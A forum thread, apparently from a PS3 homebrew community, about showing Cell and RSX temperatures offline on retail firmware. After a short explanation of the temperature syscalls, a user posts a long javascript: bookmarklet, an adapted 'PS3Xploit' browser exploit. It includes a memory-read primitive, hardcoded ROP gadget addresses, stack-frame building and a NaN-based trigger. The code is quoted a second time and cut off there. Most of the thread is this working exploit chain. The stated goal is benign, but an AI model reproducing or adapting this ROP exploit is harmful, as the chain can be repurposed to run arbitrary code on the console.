in1975
Member
On http://pett.hexcsl.com/files/index_english_us.html we can Show Cell/RSX Temp.
@lmn7 do you make java script to display temperature offline?
@lmn7 do you make java script to display temperature offline?
PS3 [Tutorial] How to enable HAN offline
- Thread starter lmn7
- Start date
That's a good idea, but if you look at the PETT source files you will see it loads multiple external JS files, which I would have to combine - then remove all the GUI/messaging stuff along with other functions no longer in use - all for a chance of it being small enough to work offline...
TLDR: It will take far too long and probably won't even work in the end, lol. But I won't say it's impossible, to be completely honest I'm just too lazy to do the work.
esc0rtd3w
Developer
@lmn7
its just 2 syscalls, really
the logic and math are here for displaying on the screen...its a bit sloppy, but works lol
this is where it makes the syscalls
here are the params
its just this
syscallTwoAndExit(get_temperature_cell,get_temperature_temp_cell_ptr,0,0,0,0,0,0,sc_sys_game_get_temperature,temp_addr_8A,temp_addr_8B,get_temperature_rsx,get_temperature_temp_rsx_ptr,0,0,0,0,0,0,sc_sys_game_get_temperature,temp_addr_8A,temp_addr_8B);
which breaks down to this
syscallTwoAndExit(0,0x8C000100,0,0,0,0,0,0,0x0000017F,0x8A000000,0x8B000000,0x00000001,0x8C000200,0,0,0,0,0,0,0x0000017F,0x8A000000,0x8B000000);
that function makes 2 syscalls, one after another. for CPU and RSX
PETT uses a different way of making syscalls than v3, as it's originally based from 1.0, with a few key 2.0 features added afterwards
PETT: r3, r4, r5, r6, r7, r8, r9, r10, r11, r30, r31
v3: r11, r3, r4, r5, r6, r7, r8, r9, r10, r31
to use this in v3, you could just do something like this
For CPU
+syscall(0x17F,0,gtemp_addr,0,0,0,0,0,0)
For RSX
+syscall(0x17F,1,gtemp_addr,0,0,0,0,0,0)
here is what it would basically look like in v3 JS
gtemp_addr is the offset where it will store the returned value, in hex
gtemp_addr is 0x8D000000 by default
to make the temp results pretty, you have to apply some math stuffs lol
its just 2 syscalls, really
the logic and math are here for displaying on the screen...its a bit sloppy, but works lol
this is where it makes the syscalls
here are the params
its just this
syscallTwoAndExit(get_temperature_cell,get_temperature_temp_cell_ptr,0,0,0,0,0,0,sc_sys_game_get_temperature,temp_addr_8A,temp_addr_8B,get_temperature_rsx,get_temperature_temp_rsx_ptr,0,0,0,0,0,0,sc_sys_game_get_temperature,temp_addr_8A,temp_addr_8B);
which breaks down to this
syscallTwoAndExit(0,0x8C000100,0,0,0,0,0,0,0x0000017F,0x8A000000,0x8B000000,0x00000001,0x8C000200,0,0,0,0,0,0,0x0000017F,0x8A000000,0x8B000000);
that function makes 2 syscalls, one after another. for CPU and RSX
PETT uses a different way of making syscalls than v3, as it's originally based from 1.0, with a few key 2.0 features added afterwards
PETT: r3, r4, r5, r6, r7, r8, r9, r10, r11, r30, r31
v3: r11, r3, r4, r5, r6, r7, r8, r9, r10, r31
r11 is special, its the syscall number, followed by r3 through r10 for arguments, r3 being argument 1, as well as the return register
to use this in v3, you could just do something like this
For CPU
+syscall(0x17F,0,gtemp_addr,0,0,0,0,0,0)
For RSX
+syscall(0x17F,1,gtemp_addr,0,0,0,0,0,0)
here is what it would basically look like in v3 JS
gtemp_addr is the offset where it will store the returned value, in hex
gtemp_addr is 0x8D000000 by default
to make the temp results pretty, you have to apply some math stuffs lol
Last edited:
LOL, I only glanced over the files actually, like I said I'm lazy
. But thanks for helping out a total JS noob like me. You actually forgot to mention that the checkMemory function is different in v3, which is why it kept failing on my end, very annoying. Got it working once I noticed the params were different:
Code:
javascript:var temp='var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",gadget12_addr=0x0C864C;document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline Temperature Reader by lmn7\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Reading CELL & RSX temperature values...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);function hex16(s){return(\470000\47+s).slice(-4)}function s2hex(a){var b=[];var i=0;for(;i\74a.length;i++){b.push(hex16(a.charCodeAt(i).toString(16)))}return b.join("")}function showTemps(){temp_cell=checkTempMem(0x8C000100-0x8,0x100,0x100,10);temp_cell=s2hex(temp_cell).slice(0,4);temp_cell_hex=temp_cell.slice(0,2);temp_cell_hexf=temp_cell.slice(2,4);temp_cell_hexc=parseInt(temp_cell_hexf,16)/256;temp_cell_hex_final=parseInt(temp_cell_hex,16).toString()+"."+temp_cell_hexc.toString();temp_rsx=checkTempMem(0x8C000200-0x8,0x100,0x100,10);temp_rsx=s2hex(temp_rsx).slice(0,4);temp_rsx_hex=temp_rsx.slice(0,2);temp_rsx_hexf=temp_rsx.slice(2,4);temp_rsx_hexc=parseInt(temp_rsx_hexf,16)/256;temp_rsx_hex_final=parseInt(temp_rsx_hex,16).toString()+"."+temp_rsx_hexc.toString();alert("CELL: "+temp_cell_hex_final+" C\\nRSX: "+temp_rsx_hex_final+" C")}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkTempMem(a,b,c,d){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(d,c)}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}stack_frame=stack_frame_hookup()+syscall(0x0000017F,0,0x8C000100,0,0,0,0,0,0)+syscall(0x0000017F,1,0x8C000200,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){debug=true;debug=false}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(showTemps,2000);t_out=0;total_loops=0}initROP(true);';eval(temp);Pretty cool that we can use these scripts on OFW, very useful
.By the way, if you use these scripts, please leave the credits. I obviously did not write the base scripts and I acknowledge that, but I did spend hours carefully removing functions to allow offline use. Thanks.
ShaolinAssassin
Developer
LOL, I only glanced over the files actually, like I said I'm lazy
Code:javascript:var temp='var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",gadget12_addr=0x0C864C;document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline Temperature Reader by lmn7\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Reading CELL & RSX temperature values...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);function hex16(s){return(\470000\47+s).slice(-4)}function s2hex(a){var b=[];var i=0;for(;i\74a.length;i++){b.push(hex16(a.charCodeAt(i).toString(16)))}return b.join("")}function showTemps(){temp_cell=checkTempMem(0x8C000100-0x8,0x100,0x100,10);temp_cell=s2hex(temp_cell).slice(0,4);temp_cell_hex=temp_cell.slice(0,2);temp_cell_hexf=temp_cell.slice(2,4);temp_cell_hexc=parseInt(temp_cell_hexf,16)/256;temp_cell_hex_final=parseInt(temp_cell_hex,16).toString()+"."+temp_cell_hexc.toString();temp_rsx=checkTempMem(0x8C000200-0x8,0x100,0x100,10);temp_rsx=s2hex(temp_rsx).slice(0,4);temp_rsx_hex=temp_rsx.slice(0,2);temp_rsx_hexf=temp_rsx.slice(2,4);temp_rsx_hexc=parseInt(temp_rsx_hexf,16)/256;temp_rsx_hex_final=parseInt(temp_rsx_hex,16).toString()+"."+temp_rsx_hexc.toString();alert("CELL: "+temp_cell_hex_final+" C\\nRSX: "+temp_rsx_hex_final+" C")}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkTempMem(a,b,c,d){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(d,c)}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}stack_frame=stack_frame_hookup()+syscall(0x0000017F,0,0x8C000100,0,0,0,0,0,0)+syscall(0x0000017F,1,0x8C000200,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshol